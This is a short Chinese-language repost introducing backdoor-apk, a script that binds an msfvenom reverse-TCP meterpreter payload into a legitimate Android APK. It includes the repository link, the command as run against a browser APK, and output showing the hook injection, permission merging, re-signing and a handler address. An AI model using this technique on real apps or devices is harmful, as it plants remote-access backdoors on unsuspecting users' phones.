backdoor-apk - 安卓APK后门捆绑脚本
2020-03-22 11:13:33 Author: mp.weixin.qq.com(查看原文) 阅读量:185 收藏


项目地址

https://github.com/dana-at-cp/backdoor-apk

项目介绍

backdoor-apk是一个bash写的脚本,通过msfvenom生成一个android的payload,然后再使用apktools将payload捆绑到正常的apk文件中。

使用方法

root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk
[*] Generating reverse tcp meterpreter payload...done.
[+] Handle the meterpreter connection at: 10.6.9.31:1337
[*] Decompiling original APK file...done.
[*] Decompiling RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Merging permissions of original and payload projects...done.
[*] Recompiling original project with backdoor...done.
[*] Signing recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#

文章出处:黑客工具箱

推荐文章++++

*Obfuscapk:一款针对Android应用程序的黑盒混淆工具

*GDA:一款基于C++的新型Android逆向分析工具

*安卓蓝牙非交互漏洞POC还是来了(CVE-2020-0022)


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650460290&idx=4&sn=fb0d7984d71546935c37d549eb1c583e&chksm=83bbb566b4cc3c7097110a9bb06cb48c61faeb902b696fa93572f3d327fb00bb774c584e6001#rd
如有侵权请联系:admin#unsafe.sh